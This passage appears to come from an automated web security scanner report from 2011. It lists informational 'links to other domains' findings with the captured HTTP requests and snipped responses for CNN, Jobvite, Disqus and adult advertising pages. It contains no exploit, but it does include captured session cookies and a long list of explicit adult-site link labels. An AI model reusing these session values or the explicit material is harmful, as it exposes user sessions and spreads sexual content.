<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

13.24. http://hire.jobvite.com/widget20.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /widget20.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /widget20.js?v=68 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&cs=93q9Vfwh&su=fsY9Vfwe&page=Job%20Description&j=oRqPVfwL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=197432630.368055241.1313432945.1313432945.1313432945.1; __utmb=197432630.2.10.1313432945; __utmc=197432630; __utmz=197432630.1313432945.1.1.utmcsr=ask|utmccn=(organic)|utmcmd=organic|utmctr=xss; __utmv=197432630.|1=UserId=c0d7ec62-d5a9-4742-877b-e051c1fca917=1,2=CompanyId=qXY9VfwJ=1,3=SubsidiaryId=fsY9Vfwe=1; http-cookie-8hr=R3814240431; ASP.NET_SessionId=550nokfur4olvw55sph4c3ry; guestidc=11b0349d-31a4-41e3-8517-100f84ee11e4

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 18:44:22 GMT
Accept-Ranges: bytes
ETag: "07a7229dfbcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:37:29 GMT
Content-Length: 41122

/*
* COPYRIGHT 2011 Jobvite, Inc. All rights reserved. This copyright notice is Copyright Management
* Information under 17 USC 1202 and is included to protect this work and deter copyright infringem
...[SNIP]...

       jvwidgetbaseurl = jvwidgetbaseurl.substring(0, p + 1);

//Raj adding fb connectivity for ssl sites
   var pos = jvwidgetbaseurl.indexOf('https')
   if(pos >= 0)
document.writeln('<script src="https://www.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>');
else
document.writeln('<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

13.25. http://i.cdn.turner.com/cnn/.element/js/3.0/video/cvp_suppl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.cdn.turner.com
Path:   /cnn/.element/js/3.0/video/cvp_suppl.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cnn/.element/js/3.0/video/cvp_suppl.js?id=20100816 HTTP/1.1
Host: i.cdn.turner.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:44:56 GMT
Expires: Mon, 15 Aug 2011 19:05:10 GMT
Last-Modified: Thu, 21 Jul 2011 18:43:59 GMT
Cache-Control: max-age=3600
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Apache
Content-Length: 49601

//load the cvp
   // -----------------------------------------------------------------------------
   // Globals
   // Major version of Flash required
   var requiredMajorVersion = 10;
   // Minor version of Fl
...[SNIP]...
hild( descContentDiv );
                       }

                       // insert/update fb:like/fb:recommendations node here
                       cnnUpdateFBWidget({ videoId: videoId });

                   }

               }
           });
       }
   }
   else
   {
       $(domIdStr).update( '<a href="http://get.adobe.com/flashplayer/" target="_blank"><img src="'+noFlashImage+'" width="'+playerWidth+'" height="'+playerHeight+'" alt="" border="0">
...[SNIP]...

13.26. http://ifa.camads.net/dif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ifa.camads.net
Path:   /dif/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dif/?cid=xhamstercams-140x1800 HTTP/1.1
Host: ifa.camads.net
Proxy-Connection: keep-alive
Referer: http://a2.mediagra.com/b.php?s=13
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Mon, 15 Aug 2011 19:05:57 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: 0
Last-Modified: now
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 10547

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>xhamster
...[SNIP]...
<td><a class="head" href="http://www.xhamstercams.com/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Live Cams</a>
...[SNIP]...
<td><a class="link" href="http://www.xhamstercams.com/webcam/teen-girls/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Teen Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/lesbian-couples/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Lesbian Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/housewives/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Housewife Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/search.php?q=squirting&submit=Search?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Squirting Cams</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/webcam/big-tits/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Big Tits Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/ebony-girls/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Ebony Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/latin-girls/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Latina Cams</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/webcam/asian-girls/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Asian Cams</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/search.php?q=india&submit=Search?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Indian Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/pregnant-women/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Pregnant Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/huge-tits/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Huge Tits Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Amateur Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/petite-girls/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Petite Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/small-tits/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Small Tits Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/fetish/shemales/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Shemale Cams</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/webcam/bbw/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">BBW Cams</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/webcam/webcam/straight-couples/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Couple Cams</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/webcam/webcam/straight-couples/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Blowjob Cams</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/webcam/anal-sex/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Anal Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/group-sex/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Group Sex Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/housewives/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">MILF Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/college-girls/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">College Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/granny/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Granny Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/mature-women/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Mature Cams</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/webcam/fetish/bdsm/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Bondage Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/pornstars/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Pornstar Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/shaved/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Shaved Pussy Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/hairy-girls/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Hairy Pussy Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/mature-women/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Cougar Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/curvy/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Curvy Cams</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/webcam/blonde-girls/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Blonde Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/redhead-girls/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Redhead Cams</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/webcam/brunette-girls/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Brunette Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/medium-tits/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Medium Tits Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/girls-with-toys/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Sex Toy Cams</a>
...[SNIP]...
<td><a class="head" href="http://www.xhamstercams.com/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Specialty Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/pregnant-women/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Lactating Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/fetish/shemales/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Shemale Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/fetish/tranny/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Trannies Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/feet-fetish/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Feet Fetish Cams</a>
...[SNIP]...
<td> <a class="link" href="http://www.xhamstercams.com/webcam/gay-guys/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Gay Cams</a>
...[SNIP]...
<td><a class="head" href="http://www.xhamstercams.com/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Cam Features</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Free Chat</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/index.php?pagenum=1&sort_language=none&sort_region=none&sort_feature=party&filter_rating=none?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Party Chat</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/index.php?pagenum=1&sort_language=none&sort_region=none&sort_feature=hd&filter_rating=none?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">HD Video</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/index.php?pagenum=1&sort_language=none&sort_region=none&sort_feature=audio&filter_rating=none?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Audio</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/index.php?pagenum=1&sort_language=none&sort_region=none&sort_feature=phone&filter_rating=none?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Phone</a>
...[SNIP]...
<td><a class="head" href="http://www.xhamstercams.com/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Cam Rankings</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/index.php?pagenum=1&sort_language=none&sort_region=none&sort_feature=none&filter_rating=500?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Top Rated</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Most Viewed</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">Most Commented</a>
...[SNIP]...
<td>    <a class="link" href="http://www.xhamstercams.com/new.php?DF=0&AFNO=1-0-612004-344279&UHNSMTY=458" target="_blank">New Models</a>
...[SNIP]...

13.27. http://mediacdn.disqus.com/1313183665/build/system/disqus.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1313183665/build/system/disqus.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /1313183665/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=984705233015

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 12 Aug 2011 21:44:49 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 177055
X-Varnish: 976827556 976826927
Cache-Control: max-age=2343559
Expires: Sun, 11 Sep 2011 21:45:25 GMT
Date: Mon, 15 Aug 2011 18:46:06 GMT
Connection: close

DISQUS.dtpl=function(){var c={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>",getAction:function(a,e){function b(){var a=Array.prototype.slice.call(arguments);a.unshift(DISQUS.dtpl.actions.fi
...[SNIP]...
<span class="dsq-mention dsq-tt dsq-mention-twitter"original-title="Expand @'+c+'\'s profile" data-dsq-username="'+c+'" data-dsq-remote="twitter"><a class="twitter-account" href="http://twitter.com/'+c+'" onclick="window.open(\''+("http://twitter.com/intent/user?screen_name="+c)+"', 'Twitter Mention', 'height=420, width=550');return false;\">@"+c+"</a>
...[SNIP]...
</param> <embed src="http://www.youtube.com/v/'),a.put(media.location),a.put('&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed>
...[SNIP]...

13.28. http://medleyads.com/spot/5022.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /spot/5022.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /spot/5022.html?SEX=&WANT_TO_MEET=&LOCATION=&AGE=&SMOKING= HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/p/memsearch.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/; group_history=2752=1; s1082=6308=1; __utmb=251326874.0.10.1313434615; s5232=24810=1; __utma=251326874.488407081.1313434615.1313434615.1313434615.1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:36 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
P3P: CP="DSP LAW"
Vary: Accept-Encoding
X-ApacheServer: ii70-18.friendfinderinc.com
Content-Length: 1027
Content-Type: text/html


<html>
<head>
</head>
<body><div style="text-align:center; vertical-align:middle;">
<script type="text/javascript"><!--
google_ad_client = "pub-1644008520393294";
/* FF:Search Results Top Leaderbo
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

13.29. http://medleyads.com/spot/5023.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /spot/5023.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /spot/5023.html?SEX=&WANT_TO_MEET=&LOCATION=&AGE=&SMOKING= HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/p/memsearch.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/; group_history=2752=1; s1082=6308=1; __utmb=251326874.0.10.1313434615; s5232=24810=1; __utma=251326874.488407081.1313434615.1313434615.1313434615.1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:37 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
P3P: CP="DSP LAW"
Vary: Accept-Encoding
X-ApacheServer: ii111-44.friendfinderinc.com
Content-Length: 1059
Content-Type: text/html


<html>
<head>
</head>
<body><div style="text-align: center; vertical-align: middle;">
<a href=http://medleyads.com/spot/c/1313435137/1184953829/4155.html?MD=aHR0cDovL25vc3RyaW5nc2F0dGFjaGVkLmNvbS9nby9wMjE4Yy5zdWJtYWRfMTQyNTJfMV9zNTAyMw== target="_blank" title="What are you waiting for?"><img src="http://graphics.pop6.com/banners/nostringsattached/english/23573_728x90.jpg" width="728" height="90" border="0" alt="What are you waiting for?" /></a>
...[SNIP]...

13.30. http://money.cnn.com/.element/ssi/video/5.1/players/story.player.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /.element/ssi/video/5.1/players/story.player.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /.element/ssi/video/5.1/players/story.player.html?p=0&d=72576981 HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:58 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:58 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 1710

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>CNNMoney video player</title>
<!--[if LT IE 7]>
<link rel="stylesheet" type="text/css" href="http://i.cdn.tur
...[SNIP]...
<![endif]-->

<link rel="stylesheet" href="http://i.cdn.turner.com/money/.element/ssi/css/5.0/generic.resets.css" type="text/css" />
<link rel="stylesheet" href="http://i.cdn.turner.com/money/.element/ssi/css/5.0/cnnmoney.main.css" type="text/css" />
<link rel="stylesheet" href="http://i.cdn.turner.com/money/.element/ssi/css/5.0/video/video.player.css" type="text/css" />

<script type="text/javascript" src="http://z.cdn.turner.com/money/.element/script/jquery/1.5.2/jquery.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.main/876.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://i.cdn.turner.com/xslo/cvp/ads/freewheel/js/fwjslib_1.1.js?version=1.1"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/4.0/video/common/cvp.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.story.player/935.js"></script>
...[SNIP]...

13.31. http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /2011/08/15/markets/markets_newyork/index.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2 HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:50 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:16 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 63285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Market Report - Aug. 15
...[SNIP]...
<meta name="description" content="U.S. stocks moved solidly higher Monday, as merger activity set a positive tone on Wall Street. "><link rel="image_src" href="http://i2.cdn.turner.com/money/2011/08/15/markets/markets_newyork/chart_ws_index_dow_2011815132327.01.png"><link rel="canonical" href="http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm">
...[SNIP]...
<meta property="fb:page_id" content="139321929435426"/>


<link rel="stylesheet" href="http://z.cdn.turner.com/money/.e/ssi/css/2.0/pkg/cnnmoney.story/1414.css" type="text/css" />


<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.main/876.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/jquery/1.5.1/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
<div id="cnnHeader" class="moneyMarketsNav"><script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script>
...[SNIP]...
<a href="/"><img src="http://i2.cdn.turner.com/money/.element/img/5.0/logos/cnnmoney_mainnav.gif" width="218" height="67" alt="CNNMoney" title="CNNMoney" class="img-logo" /></a>
...[SNIP]...
<li id="mm-share-twitter"><a href="http://twitter.com/cnnmoney" target="new"><img src="http://i.cdn.turner.com/money/.element/img/5.0/misc/social_nav_t.gif" height="20" width="20"></a></li>
       <li id="mm-like-facebook"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fcnnmoney&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;height=27" scrolling="no" frameborder="0" allowTransparency="true"></iframe>
...[SNIP]...
<a href="/data/us_markets/"><img src="http://i2.cdn.turner.com/money/2011/08/15/markets/markets_newyork/chart_ws_index_dow_2011815132327.top.png" alt="stock market" width="475" height="280" border="0"/></a>
...[SNIP]...
<a href="#TOP"><img src="http://i.cdn.turner.com/money/images/bug.gif" alt="To top of page" border="0" width="7" height="7"></a>
...[SNIP]...
<li><a href="http://www.bankrate.com/finance/insurance/life-insurance-agent-make-1.aspx?pid=p:cnn&ec_id=cnn_money_insur_text" target="_blank">How much does a life insurance agent pocket?</a>
...[SNIP]...
<li><a href="http://www.bankrate.com/finance/insurance/6-myths-buying-life-insurance-1.aspx?pid=p:cnn&ec_id=cnn_money_insur_text" target="_blank">6 myths about buying life insurance</a>
...[SNIP]...
<li><a href="http://www.bankrate.com/finance/video/how-much-life-insurance-do-you-need.aspx?pid=p:cnn&ec_id=cnn_money_insur_text" target="_blank">How much life insurance do you need?</a>
...[SNIP]...
<li><a href="http://www.bankrate.com/finance/insurance/sniffing-out-life-insurance-fraud.aspx?pid=p:cnn&ec_id=cnn_money_insur_text" target="_blank">Is someone betting on your death?</a>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/2.0/bankrate.js"></script>
...[SNIP]...
<li class="bankrates-mtg"><a href="http://www.bankrate.com/funnel/mortgages/mortgage-results.aspx?pid=p:cnn&market=4&loan=200000.00&prods=166&points=Zero" target="_blank">30 yr fixed mtg, 0 points, Los Angeles, CA, APR 4.625%</a>
...[SNIP]...
<li class="bankrates-mtg"><a href="http://www.bankrate.com/funnel/mortgages/mortgage-results.aspx?pid=p:cnn&market=4&loan=200000.00&prods=166&points=Zero" target="_blank">30 yr fixed mtg, 0 points, Los Angeles, CA, APR 4.625%</a>
...[SNIP]...
<li class="bankrates-mtg"><a href="http://www.bankrate.com/funnel/mortgages/mortgage-results.aspx?pid=p:cnn&market=236&loan=165000.00&prods=216&points=Zero" target="_blank">30 yr fixed, 0 points refi, Elizabeth, NJ, APR 4.625%</a>
...[SNIP]...
<li class="bankrates-mtg"><a href="http://www.bankrate.com/funnel/mortgages/mortgage-results.aspx?pid=p:cnn&market=236&loan=165000.00&prods=216&points=Zero" target="_blank">30 yr fixed, 0 points refi, Elizabeth, NJ, APR 4.750%</a>
...[SNIP]...
